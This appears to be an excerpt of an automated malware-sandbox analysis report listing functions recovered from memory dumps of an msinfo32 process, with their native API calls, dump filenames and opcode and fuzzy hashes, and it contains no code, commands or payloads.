                                                                                                        • Opcode ID: dcc19046a45c2933493b84679adabaea5439e4c42be96d416aadabb5cd52c5cf
                                                                                                        • Instruction ID: c6e80855170e06ac95bd8dddbd767fff59e4c5a8792088da9a2c8bd4dcfb3867
                                                                                                        • Opcode Fuzzy Hash: dcc19046a45c2933493b84679adabaea5439e4c42be96d416aadabb5cd52c5cf
                                                                                                        • Instruction Fuzzy Hash: C231B5B5A01208AFDB14DF99D891EEEB7B9EF8C314F108219F919A7340D770A911CBA5
                                                                                                        Function 02EC97D0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtReadFile.NTDLL(?,CC4F3AA0,?,?,?,?,?,?,?), ref: 02EC98B3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: 0d4bf3b4a3e5cce63f76b9c5549e5ad54fbeb027fe2f0c70a33013416f466071
                                                                                                        • Instruction ID: b6f80aa5a721641a288daba14467f67fcd0a1aa6dda7ddd1526b39da01cd9c9e
                                                                                                        • Opcode Fuzzy Hash: 0d4bf3b4a3e5cce63f76b9c5549e5ad54fbeb027fe2f0c70a33013416f466071
                                                                                                        • Instruction Fuzzy Hash: E131C975A00208AFDB14DF99D881EEFB7B9EF88314F108219F919A7340D770A911CFA5
                                                                                                        Function 02EC9AC0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(02EB227E,CC4F3AA0,02EC843E,00000000,00000004,00003000,?,?,?,?,?,02EC843E,02EB227E,02EC843E,8FE85657,02EB227E), ref: 02EC9B85
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: fb8b4c81b67e4da6d1238c1eeabe7fed388438486c0fb2f5ae59a534951c3a67
                                                                                                        • Instruction ID: 4dc42bb5d76e40962779a69300bbf82b182dfccbc50d91bcb7166e1b3fd5b3ca
                                                                                                        • Opcode Fuzzy Hash: fb8b4c81b67e4da6d1238c1eeabe7fed388438486c0fb2f5ae59a534951c3a67
                                                                                                        • Instruction Fuzzy Hash: FF2119B5A40209AFDB14DF98DC41FAFB7B9EF88700F10811DF918A7240D770A9128BA5
                                                                                                        Function 02EC98C0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 4033686569-0
                                                                                                        • Opcode ID: e465f5b7993ed442ba0cf7bda70828c2a595861c945c1c01b649800edf57c338
                                                                                                        • Instruction ID: 18ff8752f86e5b46836d41f966def5bbb59d31e25199691c07218c21fdc6304e
                                                                                                        • Opcode Fuzzy Hash: e465f5b7993ed442ba0cf7bda70828c2a595861c945c1c01b649800edf57c338
                                                                                                        • Instruction Fuzzy Hash: FE1191316402046EDA20EBA8DC51FAB776DEF85714F108109F948AB280D7B07502CBA5
                                                                                                        Function 02EC9960 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02EC9994
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 1a3ac9ed52abc80fff84237a99ff0edf4a748cc7e4aaa16ecd6c3ba37d3716ea
                                                                                                        • Instruction ID: 9a199a0473b624aa08a1acc085f549c5e4f098c6c2c3e8c1bddd5052cb71670b
                                                                                                        • Opcode Fuzzy Hash: 1a3ac9ed52abc80fff84237a99ff0edf4a748cc7e4aaa16ecd6c3ba37d3716ea
                                                                                                        • Instruction Fuzzy Hash: 63E04F362502147BD510AA59DC11F9B775EDBC6760F008055FA08AB240C671791187F5
                                                                                                        Function 04E835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: dbd8a44a03da6a98df38a6c054061f1cf21091c2c1c7dc3c40aa514d5a860bf8
                                                                                                        • Instruction ID: 22910530974eddf532a40ae7df8257f8f9e5c1480f35be8a652b614e9ad9dfaa
                                                                                                        • Opcode Fuzzy Hash: dbd8a44a03da6a98df38a6c054061f1cf21091c2c1c7dc3c40aa514d5a860bf8
                                                                                                        • Instruction Fuzzy Hash: 0B90023161550402F5407158451570610459BD1205F65D411A082956DD87D5DE5165A6
                                                                                                        Function 04E84650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 71915600f73691c5ba8431d9bcc7976b87944377331bb473042a9d853250009f
                                                                                                        • Instruction ID: 443ec216603e8f371b61eb46e24e89fdecdf24638d8b9c4bce067ab7e6a13ea0
                                                                                                        • Opcode Fuzzy Hash: 71915600f73691c5ba8431d9bcc7976b87944377331bb473042a9d853250009f
                                                                                                        • Instruction Fuzzy Hash: E3900271611500426580715848054066045ABE2305395D115A0959565C8658DD55926D
                                                                                                        Function 04E84340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: fd0510c7285bfa77dcfe9f2be6303be148f17d959e0d2a9cba3b3aaa53663aa2
                                                                                                        • Instruction ID: 10e31b4db01d31b12e90c1ea644ec470850a4fed45c74d74d96215e5dd01f37d
                                                                                                        • Opcode Fuzzy Hash: fd0510c7285bfa77dcfe9f2be6303be148f17d959e0d2a9cba3b3aaa53663aa2
                                                                                                        • Instruction Fuzzy Hash: 4690023161580012B580715848855464045ABE1305B55D011E0829559C8A54DE565365
                                                                                                        Function 04E82CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 8cc45c7acc8993398c35485a3d9bcecfa1a0f43b98866e6d22f9778343e0e9df
                                                                                                        • Instruction ID: 2726095e8aaaddefb069a507497fdc9f6527065055db0d72f037e654a9acd8fc
                                                                                                        • Opcode Fuzzy Hash: 8cc45c7acc8993398c35485a3d9bcecfa1a0f43b98866e6d22f9778343e0e9df
                                                                                                        • Instruction Fuzzy Hash: BA90023121140402F5407598540964600459BE1305F55E011A542955AEC6A5DD916135
                                                                                                        Function 04E82C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 6cf558cd188d9f479f38ce543c61480ded46e9e9bf0878d5a64ce6844da7acb2
                                                                                                        • Instruction ID: a0dc7ccbeb86fab12777a3fed1eff2ca8175cfaaf9282e438d93ba80e64e04a9
                                                                                                        • Opcode Fuzzy Hash: 6cf558cd188d9f479f38ce543c61480ded46e9e9bf0878d5a64ce6844da7acb2
                                                                                                        • Instruction Fuzzy Hash: 6C90023121140842F54071584405B4600459BE1305F55D016A0529659D8655DD517525
                                                                                                        Function 04E82C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: a36340a4932b4cc771df6a16aef5befaf96f1a4aa51c191909cff0066b9c75cb
                                                                                                        • Instruction ID: a83cf8997fbe396bfd4b18475ffbb6156f9f7fa21119109351f9ebe9d535dc3b
                                                                                                        • Opcode Fuzzy Hash: a36340a4932b4cc771df6a16aef5befaf96f1a4aa51c191909cff0066b9c75cb
                                                                                                        • Instruction Fuzzy Hash: 8590023121148802F5507158840574A00459BD1305F59D411A482965DD86D5DD917125
                                                                                                        Function 04E82DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 234a4c0227cf51290dc737ee93867b4a173dae218a793e3aa683b943d3464094
                                                                                                        • Instruction ID: cfae25ee21bfbf24592fb758b7b028e5a85fca0234121f85b3f9f044ad734e83
                                                                                                        • Opcode Fuzzy Hash: 234a4c0227cf51290dc737ee93867b4a173dae218a793e3aa683b943d3464094
                                                                                                        • Instruction Fuzzy Hash: 3490023121140413F5517158450570700499BD1245F95D412A082955DD9696DE52A125
                                                                                                        Function 04E82DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 24029d9cd81d43711ee571569dd5cd2af446a32f2f6f9301142ddae4e39fa3be
                                                                                                        • Instruction ID: 6eaf3171eed55d2d7f6a40e5a0017d0fa810f79cd6385440d4079b91ccb6c033
                                                                                                        • Opcode Fuzzy Hash: 24029d9cd81d43711ee571569dd5cd2af446a32f2f6f9301142ddae4e39fa3be
                                                                                                        • Instruction Fuzzy Hash: 9D900231252441527985B15844055074046ABE1245795D012A1819955C8566ED56D625
                                                                                                        Function 04E82D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 39d2f4c0306a70f6ee1fbfc1eb49d313fa128f3dd74e434212b549ebb6f78049
                                                                                                        • Instruction ID: 8eb482ffee4df84decdee4854bd64f0c265ae72a73a84ec6d2a02c2ed7e2673b
                                                                                                        • Opcode Fuzzy Hash: 39d2f4c0306a70f6ee1fbfc1eb49d313fa128f3dd74e434212b549ebb6f78049
                                                                                                        • Instruction Fuzzy Hash: AC90023131140003F580715854196064045EBE2305F55E011E0819559CD955DD565226
                                                                                                        Function 04E82D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 7a7bf7b9390819f0c213cfa1ef36a0a17e6ab523de5dc3de71a9d0c3f118c060
                                                                                                        • Instruction ID: 19d7345cd64ac62c55531e7e0c54e22fa5928bbdf85b88f32f2c2b144bdc4b3c
                                                                                                        • Opcode Fuzzy Hash: 7a7bf7b9390819f0c213cfa1ef36a0a17e6ab523de5dc3de71a9d0c3f118c060
                                                                                                        • Instruction Fuzzy Hash: 2490023922340002F5C07158540960A00459BD2206F95E415A041A55DCC955DD695325
                                                                                                        Function 04E82EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 16720ff9d01f1dbfdc3e3d69e9465195a2ee665d608b9f0758aeaf13e458915a
                                                                                                        • Instruction ID: 5f7e33ec3a092c85b2bc879c177b4ca8d5042e129a5cc54fba7eeb39b5eec666
                                                                                                        • Opcode Fuzzy Hash: 16720ff9d01f1dbfdc3e3d69e9465195a2ee665d608b9f0758aeaf13e458915a
                                                                                                        • Instruction Fuzzy Hash: 0290027121180403F5807558480560700459BD1306F55D011A246955AE8A69DD516139
                                                                                                        Function 04E82E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 39cfd0c948ead7ab901256ccee2c5bd5b0f161a38c5cd7b2348e905f813cc7a9
                                                                                                        • Instruction ID: 2711d11415971efa571dda5cde5297aa8456e15102fea29c47ec4ff9b2a2d10b
                                                                                                        • Opcode Fuzzy Hash: 39cfd0c948ead7ab901256ccee2c5bd5b0f161a38c5cd7b2348e905f813cc7a9
                                                                                                        • Instruction Fuzzy Hash: 6390023161140502F54171584405616004A9BD1245F95D022A142955AECA65DE92A135
                                                                                                        Function 04E82FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 7b1ee6386c5a2f65e6f462bfe46d0d435d2bfdbacfddbf5c149e03b13ebe76bd
                                                                                                        • Instruction ID: 7561452ebf5b66f30cebc45e3a77b6a02443ea52086e520c851f8fdcb180eac5
                                                                                                        • Opcode Fuzzy Hash: 7b1ee6386c5a2f65e6f462bfe46d0d435d2bfdbacfddbf5c149e03b13ebe76bd
                                                                                                        • Instruction Fuzzy Hash: AB900231221C0042F64075684C15B0700459BD1307F55D115A0559559CC955DD615525
                                                                                                        Function 04E82FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 681fafded2ceb8dc62f5313977c5ff19aacd0e3e8bb3ddcab5a80add5397b491
                                                                                                        • Instruction ID: cf915223ab4652d3bdab1315fabd3728096661a97156def1245b642ae9b75e1e
                                                                                                        • Opcode Fuzzy Hash: 681fafded2ceb8dc62f5313977c5ff19aacd0e3e8bb3ddcab5a80add5397b491
                                                                                                        • Instruction Fuzzy Hash: 58900231611400426580716888459064045BFE2215755D121A0D9D555D8599DD655669
                                                                                                        Function 04E82F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 1c2063efd8d6f047eb70cfe05cea0294d725ac552a6d9424e4162dd02fd99bd3
                                                                                                        • Instruction ID: 3024c9552ef66f966becee9ff0de0c8e1a8d8431fb9925e2c012cd9139567f90
                                                                                                        • Opcode Fuzzy Hash: 1c2063efd8d6f047eb70cfe05cea0294d725ac552a6d9424e4162dd02fd99bd3
                                                                                                        • Instruction Fuzzy Hash: 6E90027135140442F54071584415B060045DBE2305F55D015E1469559D8659DD52612A
                                                                                                        Function 04E839B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 76720a2299b938372ea99d2cf6d67395d1cc6b054bbc31d2fde9d35a3b1dcef5
                                                                                                        • Instruction ID: e5411c629a4f91b1196a70c7f0235dfc801c21dea08c9752807fee4f1d19e56a
                                                                                                        • Opcode Fuzzy Hash: 76720a2299b938372ea99d2cf6d67395d1cc6b054bbc31d2fde9d35a3b1dcef5
                                                                                                        • Instruction Fuzzy Hash: 1890023125545102F590715C44056164045BBE1205F55D021A0C19599D8595DD556225
                                                                                                        Function 04E82AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 64c70c0527dac747a10f2d31885c31d4fb78a91da53359f5a00d6325b8a6d558
                                                                                                        • Instruction ID: 883e0bdf43bc31f5b1df41b664f9423182012fe4e6f7fb83153ae1cd6b59f6b0
                                                                                                        • Opcode Fuzzy Hash: 64c70c0527dac747a10f2d31885c31d4fb78a91da53359f5a00d6325b8a6d558
